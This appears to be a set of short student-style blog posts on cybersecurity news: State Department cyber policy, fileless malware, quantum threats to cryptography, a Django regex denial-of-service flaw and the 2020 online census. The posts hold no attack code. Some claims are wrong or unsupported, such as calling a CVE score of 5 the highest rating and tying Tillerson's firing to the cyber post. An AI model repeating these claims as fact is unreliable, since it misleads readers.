Pompeo Discusses Cyber Security at the State Department

Former Secretary of State Rex Tillerson eliminated the cyber security position at the State Department about one month ago. Tillerson eliminated this position in hopes to form “a bureau focused on economic and business affairs.” This act disappointed many members of the US government, and eventually resulted in President Trump replacing Tillerson with the current CIA director Mike Pompeo. John Sullivan will serve as Secretary of State until the US Senate confirms Pompeo’s approval.

Shortly after President Trump fired Tillerson, the CIA began to put more resources into cyber security. Last Thursday, CIA Director Mike Pompeo said, “I can only say that, every element of government has a piece of its cyber duty. It’s one of the challenges that is so deeply divided, that we don’t have a central place to do cyber work.” Many believe the removal of the cyber security position at the State Department foreshadows the US not engaging in foreign affairs with cyber security. Fortunately, numerous state officials have insisted that cyber security remains a top priority at the state department. Pompeo has not given any information to his decision on the cyber security position.

-Spencer Fleming

Source : http://thehill.com/policy/cybersecurity/382882-pompeo-pressed-on-plans-for-cyber-at-state


The Rise of Fileless malware

Over the last two years, there has been an uptick in the amount the malware attacks that are fileless. This means that the malware is designed to not rely on or interacts with the filesystem of the host machine. This is so it is relatively undetectable by file scanning, which is the common way to find malware. This rising trend will change how we deal with these kind of malware threats. One of the changes to combat this threat is to turn to behavior based detection strategies like “script block logging,” which will keep track of code that is executed, for someone to sift through and look for abnormalities.

Experts are predicting that fileless malware attacks will continue to rise as it did from 2016 to 2017 because of its success rate. Fileless attacks are more likely to be successful than file-based attacks by an order of magnitude (literally 10 times more likely), according to the 2017 “State of Endpoint Security Risk” report from Ponemon. The ratio of fileless to file-based attacks grew in 2017 and is forecasted to continue to do grow this year. This goes to show that we need to constantly be adapting to different threats, because we know the hackers will.
– Ryne Krueger




Quantum Computing’s Impact on Cyber Security

With more and more technological advancements every day, our vision of quantum computing is turning more into a reality than a theory. Companies like IBM and Microsoft are accelerating forward and becoming closer than ever to build the first fully functioning quantum computer. Seemingly on the edge of an almost quantum revolution, it’s important to ask questions about how integral parts of our lives like cyber security will be affected by this change.

First, let’s understand what quantum computing is. Comparing it to modern computing, which relies on discrete values of a bit being either a 0 or a 1, quantum computing would allow both of these possibilities to exist simultaneously in something called qubits, and these values only truly form when they are observed. This allows quantum computers to handle operations and equations at speeds that are exponentially higher than what we are used to in modern computers and their energy costs are far less.

How does this effect today’s security? Many of today’s security systems rely on cryptography, this is because normal computers struggle at factoring large numbers. This means that cryptography based on factoring numbers would be a safe bet against our technology today, but with the introduction of quantum computing, these practices would be useless. This isn’t the end of cryptography though because there are some approaches in use today that will be safe against the power of a quantum computer. That doesn’t mean that important companies and governments are using them though, and if quantum computing is to take off faster than anticipated they could run into some trouble. Other security strategies that are used today, like two-factor authentication, will still be just as effective after the introduction of quantum computing, due to multiple steps being taken by the person to log into a system.

Tomorrow’s security will be something almost unfathomable with quantum-based security implementations. Techniques like theoretically unbreakable cryptography, encrypting data to stop working if anyone attempts to uncover them and guaranteeing a safe passage to send data no matter what attacks are being used against it can all be potentially achieved with quantum computing. It’s not all positive though because with the power to develop secure techniques comes the power to exploit older strategies. An almost quantum arms race has begun between intelligence agencies and this is because the first agency to gain access to quantum computing power will have an incredible edge over all other counties.

Although quantum computers may never be a household item, their impact in the world will definitely be historical. While many of their advancements will benefit society and the internet infrastructure as we know it, it is still important to make sure what the world is ready for a step this large.

-Jeremy McGrath





Sanitize your strings, kiddos

Trusting user inputted strings has always been a problem in computing. Users will always find a way to break your application with some kind of weird character. Programmers have found clever ways to get around this, such as preparing SQL statements, escaping unknown characters, or just returning an error when coming across unknown text. However, with the rise of the internet and the availability of tools, hackers have gotten smarter at the way they attack inputs.

In the last month of so, Django found this out in their django.utils.text.Truncator class. This class had two methods, chars() and words() which would attempt to clean input.

Well, for some reason, users wanted a way to clean HTML with these methods, so Django added a html keyword argument to the methods, which would attempt to clean the text as if it were HTML. However, due to a catastrophic backtracking vulnerability in a regular expression in those functions, malicious users could input complicated HTML that would take a long time to process. This would result in a DoS attack on the web server, and bring down services to other users. Uh-oh.

So, looking at the CVE, you can see the security community ranked it a 5, the highest rating. Needless to say, Django quickly patched the issue and launched a hot fix.

The moral of the story is that security vulnerabilities can happen to anyone, and you should know what the framework you are using is doing, instead of just blatantly trusting that it will work. Be aware of security in your everyday life.

— Kyle Kaniecki

2020 Online Census

In two years the United States will be conducting the census like they do every 10 years. This time though will be different. The United States will be doing a primarily online census. This could be a giant security risk.

Back in 2016, Australia decided to try an online census. As soon as the survey was posted hackers performed a giant denial-of -service attack that caused the system to go down for 2 days. Though no information was breached it still was an embarrassment for the country and proved that they weren’t ready.

The United States has been toying around with the idea of doing an online census since 2000 but it wasn’t used in 2010 do to a lack of trust in data collection effectiveness and security. It seems that the lack of trust hasn’t gone away but the pressure to move digital has caused this change.

Problems are already popping up in this census. The bureau is rushing it out which has prevented thorough testing of the security. In the tests that were conducted the data had issues being transmitted and received.

Not receiving the data could be the least of our worries though. Hackers could flood the census with phony data or breach data and release it. Both of these outcome won’t look good on our government and will further a distrust people already have since the election. Maybe it is best to wait another 10 years until our platform is more secure and trustworthy.

—- Bailey Pearson